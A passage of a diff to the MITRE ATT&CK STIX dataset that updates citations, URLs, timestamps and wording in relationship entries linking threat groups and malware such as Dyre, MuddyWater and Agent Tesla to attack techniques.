- "created": "2018-04-18T17:59:24.739Z"
- },
{
"id": "relationship--e5f75ae0-45f5-48b8-938f-f0d9e17e53eb",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
@@ -81651,16 +82739,16 @@
],
"external_references": [
{
- "url": "https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/",
- "description": "Kasza, A. and Reichel, D.. (2017, February 27). The Gamaredon Group Toolset Evolution. Retrieved March 1, 2017.",
- "source_name": "Palo Alto Gamaredon Feb 2017"
+ "source_name": "Palo Alto Gamaredon Feb 2017",
+ "description": "Kasza, A. and Reichel, D. (2017, February 27). The Gamaredon Group Toolset Evolution. Retrieved March 1, 2017.",
+ "url": "https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/"
}
],
"source_ref": "intrusion-set--2e290bfe-93b5-48ce-97d6-edcd6d32b7cf",
"relationship_type": "uses",
"target_ref": "attack-pattern--03d7999c-1f4c-42cc-8373-e7690d318104",
"type": "relationship",
- "modified": "2019-03-25T12:57:18.668Z",
+ "modified": "2020-06-22T17:54:15.767Z",
"created": "2017-05-31T21:33:27.080Z"
},
{
@@ -81672,22 +82760,22 @@
],
"external_references": [
{
- "source_name": "McAfee Gold Dragon",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/",
"description": "Sherstobitoff, R., Saavedra-Morales, J. (2018, February 02). Gold Dragon Widens Olympics Malware Attacks, Gains Permanent Presence on Victims\u2019 Systems. Retrieved June 6, 2018.",
- "url": "https://securingtomorrow.mcafee.com/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/"
+ "source_name": "McAfee Gold Dragon"
}
],
"source_ref": "malware--b9799466-9dd7-4098-b2d6-f999ce50b9a8",
"relationship_type": "uses",
"target_ref": "attack-pattern--8f4a33ec-8b1f-4b80-a2f6-642b2e479580",
"type": "relationship",
- "modified": "2020-03-16T23:58:10.653Z",
+ "modified": "2020-04-21T23:09:31.072Z",
"created": "2018-10-17T00:14:20.652Z"
},
{
"id": "relationship--812073c3-43c5-4f92-b396-56b669eee0ad",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[Dyre](https://attack.mitre.org/software/S0024) uses HTTPS for C2 communications.(Citation: Symantec Dyre June 2015)",
+ "description": "[Dyre](https://attack.mitre.org/software/S0024) uses HTTPS for C2 communications.(Citation: Symantec Dyre June 2015)(Citation: Malwarebytes Dyreza November 2015)\t ",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
@@ -81696,13 +82784,18 @@
"source_name": "Symantec Dyre June 2015",
"description": "Symantec Security Response. (2015, June 23). Dyre: Emerging threat on financial fraud landscape. Retrieved August 23, 2018.",
"url": "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/dyre-emerging-threat.pdf"
+ },
+ {
+ "source_name": "Malwarebytes Dyreza November 2015",
+ "url": "https://blog.malwarebytes.com/threat-analysis/2015/11/a-technical-look-at-dyreza/",
+ "description": "hasherezade. (2015, November 4). A Technical Look At Dyreza. Retrieved June 15, 2020."
}
],
"source_ref": "malware--63c2a130-8a5b-452f-ad96-07cf0af12ffe",
"relationship_type": "uses",
"target_ref": "attack-pattern--df8b2a25-8bdf-4856-953c-a04372b1c161",
"type": "relationship",
- "modified": "2020-03-17T01:01:23.744Z",
+ "modified": "2020-06-15T20:49:55.663Z",
"created": "2018-10-17T00:14:20.652Z"
},
{
@@ -81719,12 +82812,12 @@
"url": "http://www.secureworks.com/cyber-threat-intelligence/threats/wiper-malware-analysis-attacking-korean-financial-sector/"
}
],
- "source_ref": "malware--a19c49aa-36fe-4c05-b817-23e1c7a7d085",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--92a78814-b191-47ca-909c-1ccfe3777414",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2017-12-14T16:46:06.044Z"
+ "created": "2017-12-14T16:46:06.044Z",
+ "source_ref": "malware--a19c49aa-36fe-4c05-b817-23e1c7a7d085",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--92a78814-b191-47ca-909c-1ccfe3777414"
},
{
"id": "relationship--e7077a73-991e-4660-a13d-fb30dc36fab1",
@@ -81805,7 +82898,7 @@
{
"id": "relationship--cc13f316-0f88-4ed1-8790-b13bc35be119",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[BRONZE BUTLER](https://attack.mitre.org/groups/G0060) downloader code has included \"0\" characters at the end of the file to inflate the file size in a likely attempt to evade anti-virus detection.(Citation: Secureworks BRONZE BUTLER Oct 2017)",
+ "description": "[BRONZE BUTLER](https://attack.mitre.org/groups/G0060) downloader code has included \"0\" characters at the end of the file to inflate the file size in a likely attempt to evade anti-virus detection.(Citation: Secureworks BRONZE BUTLER Oct 2017)(Citation: Trend Micro Tick November 2019)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
@@ -81814,13 +82907,18 @@
"url": "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses",
"description": "Counter Threat Unit Research Team. (2017, October 12). BRONZE BUTLER Targets Japanese Enterprises. Retrieved January 4, 2018.",
"source_name": "Secureworks BRONZE BUTLER Oct 2017"
+ },
+ {
+ "source_name": "Trend Micro Tick November 2019",
+ "url": "https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf",
+ "description": "Chen, J. et al. (2019, November). Operation ENDTRADE: TICK\u2019s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data. Retrieved June 9, 2020."
}
],
"source_ref": "intrusion-set--93f52415-0fe4-4d3d-896c-fc9b8e88ab90",
"relationship_type": "uses",
"target_ref": "attack-pattern--5bfccc3f-2326-4112-86cc-c1ece9d8a2b5",
"type": "relationship",
- "modified": "2020-02-05T15:01:45.077Z",
+ "modified": "2020-06-24T01:27:31.909Z",
"created": "2018-01-16T16:13:52.465Z"
},
{
@@ -81993,7 +83091,7 @@
{
"id": "relationship--17f9d6c8-f938-4532-b834-3834655911b8",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[Dyre](https://attack.mitre.org/software/S0024) can detect sandbox analysis environments by inspecting the process list and Registry.(Citation: Symantec Dyre June 2015)",
+ "description": "[Dyre](https://attack.mitre.org/software/S0024) can detect sandbox analysis environments by inspecting the process list and Registry.(Citation: Symantec Dyre June 2015)(Citation: Malwarebytes Dyreza November 2015)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
@@ -82002,13 +83100,18 @@
"source_name": "Symantec Dyre June 2015",
"description": "Symantec Security Response. (2015, June 23). Dyre: Emerging threat on financial fraud landscape. Retrieved August 23, 2018.",
"url": "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/dyre-emerging-threat.pdf"
+ },
+ {
+ "source_name": "Malwarebytes Dyreza November 2015",
+ "url": "https://blog.malwarebytes.com/threat-analysis/2015/11/a-technical-look-at-dyreza/",
+ "description": "hasherezade. (2015, November 4). A Technical Look At Dyreza. Retrieved June 15, 2020."
}
],
"source_ref": "malware--63c2a130-8a5b-452f-ad96-07cf0af12ffe",
"relationship_type": "uses",
"target_ref": "attack-pattern--29be378d-262d-4e99-b00d-852d573628e6",
"type": "relationship",
- "modified": "2020-03-16T18:17:54.358Z",
+ "modified": "2020-06-15T20:49:55.655Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -82025,12 +83128,12 @@
"url": "https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf"
}
],
- "source_ref": "malware--49abab73-3c5c-476e-afd5-69b5c732d845",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--03d7999c-1f4c-42cc-8373-e7690d318104",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2018-04-18T17:59:24.739Z"
+ "created": "2018-04-18T17:59:24.739Z",
+ "source_ref": "malware--49abab73-3c5c-476e-afd5-69b5c732d845",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--03d7999c-1f4c-42cc-8373-e7690d318104"
},
{
"id": "relationship--cbb27eed-2e1c-4675-a077-28765060b349",
@@ -82077,7 +83180,7 @@
{
"id": "relationship--6d1074cb-a9eb-4237-b8b2-d823cfa1408b",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[Dyre](https://attack.mitre.org/software/S0024) decrypts resources needed for targeting the victim.(Citation: Symantec Dyre June 2015)",
+ "description": "[Dyre](https://attack.mitre.org/software/S0024) decrypts resources needed for targeting the victim.(Citation: Symantec Dyre June 2015)(Citation: Malwarebytes Dyreza November 2015)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
@@ -82086,13 +83189,18 @@
"source_name": "Symantec Dyre June 2015",
"description": "Symantec Security Response. (2015, June 23). Dyre: Emerging threat on financial fraud landscape. Retrieved August 23, 2018.",
"url": "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/dyre-emerging-threat.pdf"
+ },
+ {
+ "source_name": "Malwarebytes Dyreza November 2015",
+ "url": "https://blog.malwarebytes.com/threat-analysis/2015/11/a-technical-look-at-dyreza/",
+ "description": "hasherezade. (2015, November 4). A Technical Look At Dyreza. Retrieved June 15, 2020."
}
],
"source_ref": "malware--63c2a130-8a5b-452f-ad96-07cf0af12ffe",
"relationship_type": "uses",
"target_ref": "attack-pattern--3ccef7ae-cb5e-48f6-8302-897105fbf55c",
"type": "relationship",
- "modified": "2019-04-24T23:21:07.895Z",
+ "modified": "2020-06-15T20:49:55.661Z",
"created": "2018-10-17T00:14:20.652Z"
},
{
@@ -82198,16 +83306,16 @@
],
"external_references": [
{
- "source_name": "McAfee Gold Dragon",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/",
"description": "Sherstobitoff, R., Saavedra-Morales, J. (2018, February 02). Gold Dragon Widens Olympics Malware Attacks, Gains Permanent Presence on Victims\u2019 Systems. Retrieved June 6, 2018.",
- "url": "https://securingtomorrow.mcafee.com/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/"
+ "source_name": "McAfee Gold Dragon"
}
],
"source_ref": "malware--b9799466-9dd7-4098-b2d6-f999ce50b9a8",
"relationship_type": "uses",
"target_ref": "attack-pattern--c32f7008-9fea-41f7-8366-5eb9b74bd896",
"type": "relationship",
- "modified": "2020-03-16T23:58:10.648Z",
+ "modified": "2020-04-21T23:09:31.584Z",
"created": "2018-10-17T00:14:20.652Z"
},
{
@@ -83007,20 +84115,20 @@
{
"id": "relationship--d06420fb-1c4d-4a4e-b18e-4c0750310606",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[MuddyWater](https://attack.mitre.org/groups/G0069) has attempted to get users to enable macros and launch malicious Microsoft Word documents delivered via spearphishing emails.(Citation: Unit 42 MuddyWater Nov 2017)(Citation: FireEye MuddyWater Mar 2018)(Citation: Securelist MuddyWater Oct 2018)(Citation: Talos MuddyWater May 2019)",
+ "description": "[MuddyWater](https://attack.mitre.org/groups/G0069) has attempted to get users to enable macros and launch malicious Microsoft Word documents delivered via spearphishing emails.(Citation: Unit 42 MuddyWater Nov 2017)(Citation: FireEye MuddyWater Mar 2018)(Citation: Securelist MuddyWater Oct 2018)(Citation: Talos MuddyWater May 2019)(Citation: ClearSky MuddyWater June 2019)(Citation: Reaqta MuddyWater November 2017)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"external_references": [
{
- "source_name": "Unit 42 MuddyWater Nov 2017",
+ "url": "https://researchcenter.paloaltonetworks.com/2017/11/unit42-muddying-the-water-targeted-attacks-in-the-middle-east/",
"description": "Lancaster, T.. (2017, November 14). Muddying the Water: Targeted Attacks in the Middle East. Retrieved March 15, 2018.",
- "url": "https://researchcenter.paloaltonetworks.com/2017/11/unit42-muddying-the-water-targeted-attacks-in-the-middle-east/"
+ "source_name": "Unit 42 MuddyWater Nov 2017"
},
{
- "source_name": "FireEye MuddyWater Mar 2018",
+ "url": "https://www.fireeye.com/blog/threat-research/2018/03/iranian-threat-group-updates-ttps-in-spear-phishing-campaign.html",
"description": "Singh, S. et al.. (2018, March 13). Iranian Threat Group Updates Tactics, Techniques and Procedures in Spear Phishing Campaign. Retrieved April 11, 2018.",
- "url": "https://www.fireeye.com/blog/threat-research/2018/03/iranian-threat-group-updates-ttps-in-spear-phishing-campaign.html"
+ "source_name": "FireEye MuddyWater Mar 2018"
},
{
"description": "Kaspersky Lab's Global Research & Analysis Team. (2018, October 10). MuddyWater expands operations. Retrieved November 2, 2018.",
@@ -83028,16 +84136,26 @@
"source_name": "Securelist MuddyWater Oct 2018"
},
{
- "source_name": "Talos MuddyWater May 2019",
+ "description": "Adamitis, D. et al. (2019, May 20). Recent MuddyWater-associated BlackWater campaign shows signs of new anti-detection techniques. Retrieved June 5, 2019.",
"url": "https://blog.talosintelligence.com/2019/05/recent-muddywater-associated-blackwater.html",
- "description": "Adamitis, D. et al. (2019, May 20). Recent MuddyWater-associated BlackWater campaign shows signs of new anti-detection techniques. Retrieved June 5, 2019."
+ "source_name": "Talos MuddyWater May 2019"
+ },
+ {
+ "source_name": "ClearSky MuddyWater June 2019",
+ "url": "https://www.clearskysec.com/wp-content/uploads/2019/06/Clearsky-Iranian-APT-group-%E2%80%98MuddyWater%E2%80%99-Adds-Exploits-to-Their-Arsenal.pdf",
+ "description": "ClearSky. (2019, June). Iranian APT group \u2018MuddyWater\u2019 Adds Exploits to Their Arsenal. Retrieved May 14, 2020."
+ },
+ {
+ "source_name": "Reaqta MuddyWater November 2017",
+ "url": "https://reaqta.com/2017/11/muddywater-apt-targeting-middle-east/",
+ "description": "Reaqta. (2017, November 22). A dive into MuddyWater APT targeting Middle-East. Retrieved May 18, 2020."
}
],
"source_ref": "intrusion-set--269e8108-68c6-4f99-b911-14b2e765dec2",
"relationship_type": "uses",
"target_ref": "attack-pattern--232b7f21-adf9-4b42-b936-b9d6f7df856e",
"type": "relationship",
- "modified": "2020-03-17T14:50:07.066Z",
+ "modified": "2020-05-18T19:04:38.089Z",
"created": "2018-10-17T00:14:20.652Z"
},
{
@@ -83276,12 +84394,12 @@
"url": "https://github.com/peewpw/Invoke-PSImage"
}
],
- "source_ref": "tool--b52d6583-14a2-4ddc-8527-87fd2142558f",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2018-04-18T17:59:24.739Z"
+ "created": "2018-04-18T17:59:24.739Z",
+ "source_ref": "tool--b52d6583-14a2-4ddc-8527-87fd2142558f",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a"
},
{
"id": "relationship--ea46cbd0-7134-4ede-a117-47380ddd9b5c",
@@ -83339,7 +84457,7 @@
],
"external_references": [
{
- "url": "https://securingtomorrow.mcafee.com/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/",
"description": "Sherstobitoff, R. (2018, March 02). McAfee Uncovers Operation Honeybee, a Malicious Document Campaign Targeting Humanitarian Aid Groups. Retrieved May 16, 2018.",
"source_name": "McAfee Honeybee"
}
@@ -83348,7 +84466,7 @@
"relationship_type": "uses",
"target_ref": "attack-pattern--9efb1ea7-c37b-4595-9640-b7680cd84279",
"type": "relationship",
- "modified": "2019-03-25T12:58:44.263Z",
+ "modified": "2020-04-16T19:41:40.637Z",
"created": "2018-10-17T00:14:20.652Z"
},
{
@@ -83558,22 +84676,27 @@
{
"id": "relationship--788e8246-d835-42c6-b8b4-7efad31e4a84",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "A [Gamaredon Group](https://attack.mitre.org/groups/G0047) file stealer has the capability to steal data from newly connected logical volumes on a system, including USB drives.(Citation: Palo Alto Gamaredon Feb 2017)",
+ "description": "A [Gamaredon Group](https://attack.mitre.org/groups/G0047) file stealer has the capability to steal data from newly connected logical volumes on a system, including USB drives.(Citation: Palo Alto Gamaredon Feb 2017)(Citation: ESET Gamaredon June 2020)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"external_references": [
{
- "url": "https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/",
- "description": "Kasza, A. and Reichel, D.. (2017, February 27). The Gamaredon Group Toolset Evolution. Retrieved March 1, 2017.",
- "source_name": "Palo Alto Gamaredon Feb 2017"
+ "source_name": "Palo Alto Gamaredon Feb 2017",
+ "description": "Kasza, A. and Reichel, D. (2017, February 27). The Gamaredon Group Toolset Evolution. Retrieved March 1, 2017.",
+ "url": "https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/"
+ },
+ {
+ "source_name": "ESET Gamaredon June 2020",
+ "url": "https://www.welivesecurity.com/2020/06/11/gamaredon-group-grows-its-game/",
+ "description": "Boutin, J. (2020, June 11). Gamaredon group grows its game. Retrieved June 16, 2020."
}
],
"source_ref": "intrusion-set--2e290bfe-93b5-48ce-97d6-edcd6d32b7cf",
"relationship_type": "uses",
"target_ref": "attack-pattern--1b7ba276-eedc-4951-a762-0ceea2c030ec",
"type": "relationship",
- "modified": "2019-03-25T12:57:18.657Z",
+ "modified": "2020-06-22T17:54:16.016Z",
"created": "2017-05-31T21:33:27.080Z"
},
{
@@ -83756,13 +84879,13 @@
"description": "Zhang, X. (2017, June 28). In-Depth Analysis of A New Variant of .NET Malware AgentTesla. Retrieved November 5, 2018."
}
],
- "description": "[Agent Tesla](https://attack.mitre.org/software/S0331) lists the current running processes on the system.(Citation: Fortinet Agent Tesla June 2017)",
+ "description": "[Agent Tesla](https://attack.mitre.org/software/S0331) can list the current running processes on the system.(Citation: Fortinet Agent Tesla June 2017)",
"id": "relationship--431012d2-0ac4-49ba-b217-c118f0c1cf03",
"source_ref": "malware--e7a5229f-05eb-440e-b982-9a6d2b2b87c8",
"relationship_type": "uses",
"target_ref": "attack-pattern--8f4a33ec-8b1f-4b80-a2f6-642b2e479580",
"type": "relationship",
- "modified": "2019-04-16T14:30:35.311Z",
+ "modified": "2020-05-28T23:41:03.806Z",
"created": "2019-01-29T18:44:04.832Z"
},
{
@@ -83945,15 +85068,20 @@
"description": "Horejsi, J., et al. (2018, March 14). Tropic Trooper\u2019s New Strategy. Retrieved November 9, 2018.",
"url": "https://blog.trendmicro.com/trendlabs-security-intelligence/tropic-trooper-new-strategy/",
"source_name": "TrendMicro Tropic Trooper Mar 2018"
+ },
+ {
+ "source_name": "TrendMicro Tropic Trooper May 2020",
+ "url": "https://documents.trendmicro.com/assets/Tech-Brief-Tropic-Trooper-s-Back-USBferry-Attack-Targets-Air-gapped-Environments.pdf",
+ "description": "Chen, J.. (2020, May 12). Tropic Trooper\u2019s Back: USBferry Attack Targets Air gapped Environments. Retrieved May 20, 2020."
}
],
- "description": "[Tropic Trooper](https://attack.mitre.org/groups/G0081) has injected a DLL backdoor into a file dllhost.exe.(Citation: TrendMicro Tropic Trooper Mar 2018)",
+ "description": "[Tropic Trooper](https://attack.mitre.org/groups/G0081) has injected a DLL backdoor into dllhost.exe and svchost.exe.(Citation: TrendMicro Tropic Trooper Mar 2018)(Citation: TrendMicro Tropic Trooper May 2020)",
"id": "relationship--c31643e8-86a3-49e4-bd69-572d7e64c7c0",
"source_ref": "intrusion-set--56319646-eb6e-41fc-ae53-aadfa7adb924",
"relationship_type": "uses",
"target_ref": "attack-pattern--f4599aa0-4f85-4a32-80ea-fc39dc965945",
"type": "relationship",
- "modified": "2020-03-16T19:31:41.375Z",
+ "modified": "2020-05-21T14:55:00.407Z",
"created": "2019-01-29T20:17:49.374Z"
},
{
@@ -84017,12 +85145,12 @@
"url": "https://sophosnews.files.wordpress.com/2012/04/zeroaccess2.pdf"
}
],
- "source_ref": "malware--552462b9-ae79-49dd-855c-5973014e157f",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--0f20e3cb-245b-4a61-8a91-2d93f7cb0e9b",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2017-12-14T16:46:06.044Z"
+ "created": "2017-12-14T16:46:06.044Z",
+ "source_ref": "malware--552462b9-ae79-49dd-855c-5973014e157f",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--0f20e3cb-245b-4a61-8a91-2d93f7cb0e9b"
},
{
"id": "relationship--ce459961-3a5a-45f9-b8a4-646e9b475e19",
@@ -84549,15 +85677,20 @@
"description": "Zhang, X. (2018, April 05). Analysis of New Agent Tesla Spyware Variant. Retrieved November 5, 2018.",
"url": "https://www.fortinet.com/blog/threat-research/analysis-of-new-agent-tesla-spyware-variant.html",
"source_name": "Fortinet Agent Tesla April 2018"
+ },
+ {
+ "source_name": "Malwarebytes Agent Tesla April 2020",
+ "url": "https://blog.malwarebytes.com/threat-analysis/2020/04/new-agenttesla-variant-steals-wifi-credentials/",
+ "description": "Jazi, H. (2020, April 16). New AgentTesla variant steals WiFi credentials. Retrieved May 19, 2020."
}
],
- "description": "[Agent Tesla](https://attack.mitre.org/software/S0331) collects the username from the victim\u2019s machine.(Citation: DigiTrust Agent Tesla Jan 2017)(Citation: Fortinet Agent Tesla April 2018)",
+ "description": "[Agent Tesla](https://attack.mitre.org/software/S0331) can collect the username from the victim\u2019s machine.(Citation: DigiTrust Agent Tesla Jan 2017)(Citation: Fortinet Agent Tesla April 2018)(Citation: Malwarebytes Agent Tesla April 2020)",
"id": "relationship--3e370a6e-2a3c-4e56-aa57-fecab8d09709",
"source_ref": "malware--e7a5229f-05eb-440e-b982-9a6d2b2b87c8",
"relationship_type": "uses",
"target_ref": "attack-pattern--03d7999c-1f4c-42cc-8373-e7690d318104",
"type": "relationship",
- "modified": "2020-03-18T19:25:30.274Z",
+ "modified": "2020-05-28T23:41:03.888Z",
"created": "2019-01-29T18:44:05.081Z"
},
{
@@ -84695,16 +85828,16 @@
],
"external_references": [
{
- "source_name": "McAfee Gold Dragon",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/",
"description": "Sherstobitoff, R., Saavedra-Morales, J. (2018, February 02). Gold Dragon Widens Olympics Malware Attacks, Gains Permanent Presence on Victims\u2019 Systems. Retrieved June 6, 2018.",
- "url": "https://securingtomorrow.mcafee.com/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/"
+ "source_name": "McAfee Gold Dragon"
}
],
"source_ref": "malware--60d50676-459a-47dd-92e9-a827a9fe9c58",
"relationship_type": "uses",
"target_ref": "attack-pattern--09a60ea3-a8d1-4ae5-976e-5783248b72a4",
"type": "relationship",
- "modified": "2020-03-16T17:48:06.672Z",
+ "modified": "2020-04-21T23:09:31.622Z",
"created": "2018-10-17T00:14:20.652Z"
},
{
@@ -84883,12 +86016,12 @@
"url": "https://researchcenter.paloaltonetworks.com/2018/06/unit42-rancor-targeted-attacks-south-east-asia-using-plaintee-ddkong-malware-families/"
}
],
- "source_ref": "malware--d186c1d6-e3ac-4c3d-a534-9ddfeb8c57bb",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--f72eb8a8-cd4c-461d-a814-3f862befbf00",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2018-10-17T00:14:20.652Z"
+ "created": "2018-10-17T00:14:20.652Z",
+ "source_ref": "malware--d186c1d6-e3ac-4c3d-a534-9ddfeb8c57bb",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--f72eb8a8-cd4c-461d-a814-3f862befbf00"
},
{
"id": "relationship--1da542f3-0003-4eb7-9bb6-1bd3cced9763",
@@ -85013,7 +86146,7 @@
{
"id": "relationship--ed94edc7-e687-409e-9143-20a15190bd83",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[Shamoon](https://attack.mitre.org/software/S0140) uses HTTP for C2.(Citation: Palo Alto Shamoon Nov 2016)",
+ "description": "[Shamoon](https://attack.mitre.org/software/S0140) has used HTTP for C2.(Citation: Palo Alto Shamoon Nov 2016)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
@@ -85028,7 +86161,7 @@
"relationship_type": "uses",
"target_ref": "attack-pattern--df8b2a25-8bdf-4856-953c-a04372b1c161",
"type": "relationship",
- "modified": "2020-03-17T02:34:57.812Z",
+ "modified": "2020-06-02T21:49:34.973Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -85062,15 +86195,20 @@
"description": "Ray, V. (2016, November 22). Tropic Trooper Targets Taiwanese Government and Fossil Fuel Provider With Poison Ivy. Retrieved November 9, 2018.",
"url": "https://researchcenter.paloaltonetworks.com/2016/11/unit42-tropic-trooper-targets-taiwanese-government-and-fossil-fuel-provider-with-poison-ivy/",
"source_name": "Unit 42 Tropic Trooper Nov 2016"
+ },
+ {
+ "source_name": "TrendMicro Tropic Trooper May 2020",
+ "url": "https://documents.trendmicro.com/assets/Tech-Brief-Tropic-Trooper-s-Back-USBferry-Attack-Targets-Air-gapped-Environments.pdf",
+ "description": "Chen, J.. (2020, May 12). Tropic Trooper\u2019s Back: USBferry Attack Targets Air gapped Environments. Retrieved May 20, 2020."
}
],
- "description": "[Tropic Trooper](https://attack.mitre.org/groups/G0081) enumerates the running processes on the system.(Citation: Unit 42 Tropic Trooper Nov 2016)",
+ "description": "[Tropic Trooper](https://attack.mitre.org/groups/G0081) is capable of enumerating the running processes on the system using pslist.(Citation: Unit 42 Tropic Trooper Nov 2016)(Citation: TrendMicro Tropic Trooper May 2020)",
"id": "relationship--17cafa26-57f1-4efb-9d23-1399cd2de4cd",
"source_ref": "intrusion-set--56319646-eb6e-41fc-ae53-aadfa7adb924",
"relationship_type": "uses",
"target_ref": "attack-pattern--8f4a33ec-8b1f-4b80-a2f6-642b2e479580",
"type": "relationship",
- "modified": "2019-06-30T22:44:28.193Z",
+ "modified": "2020-05-29T03:23:28.026Z",
"created": "2019-01-29T20:17:49.270Z"
},
{
@@ -85230,12 +86368,12 @@
"url": "https://researchcenter.paloaltonetworks.com/2018/07/unit42-bisonal-malware-used-attacks-russia-south-korea/"
}
],
- "source_ref": "malware--65ffc206-d7c1-45b3-b543-f6b726e7840d",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--f879d51c-5476-431c-aedf-f14d207e4d1e",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2018-10-17T00:14:20.652Z"
+ "created": "2018-10-17T00:14:20.652Z",
+ "source_ref": "malware--65ffc206-d7c1-45b3-b543-f6b726e7840d",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--f879d51c-5476-431c-aedf-f14d207e4d1e"
},
{
"id": "relationship--1ab99abc-fa2a-4cc5-8cb4-4116e305a819",
@@ -85246,7 +86384,7 @@
],
"external_references": [
{
- "url": "https://securingtomorrow.mcafee.com/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/",
"description": "Sherstobitoff, R. (2018, March 02). McAfee Uncovers Operation Honeybee, a Malicious Document Campaign Targeting Humanitarian Aid Groups. Retrieved May 16, 2018.",
"source_name": "McAfee Honeybee"
}
@@ -85255,7 +86393,7 @@
"relationship_type": "uses",
"target_ref": "attack-pattern--57340c81-c025-4189-8fa0-fc7ede51bae4",
"type": "relationship",
- "modified": "2019-03-25T12:58:44.259Z",
+ "modified": "2020-04-16T19:41:40.635Z",
"created": "2018-10-17T00:14:20.652Z"
},
{
@@ -85314,12 +86452,12 @@
"url": "https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf"
}
],
- "source_ref": "malware--211cfe9f-2676-4e1c-a5f5-2c8091da2a68",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2018-04-18T17:59:24.739Z"
+ "created": "2018-04-18T17:59:24.739Z",
+ "source_ref": "malware--211cfe9f-2676-4e1c-a5f5-2c8091da2a68",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add"
},
{
"id": "relationship--72f9bf47-61ac-42c8-acbf-65be7c25af0f",
@@ -85457,7 +86595,7 @@
{
"id": "relationship--ec8f73de-eab1-4d3b-88c0-7885716aa748",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[Dark Caracal](https://attack.mitre.org/groups/G0070) took screen shots using their Windows malware.(Citation: Lookout Dark Caracal Jan 2018)",
+ "description": "[Dark Caracal](https://attack.mitre.org/groups/G0070) took screenshots using their Windows malware.(Citation: Lookout Dark Caracal Jan 2018)",
"object_marking_refs": [
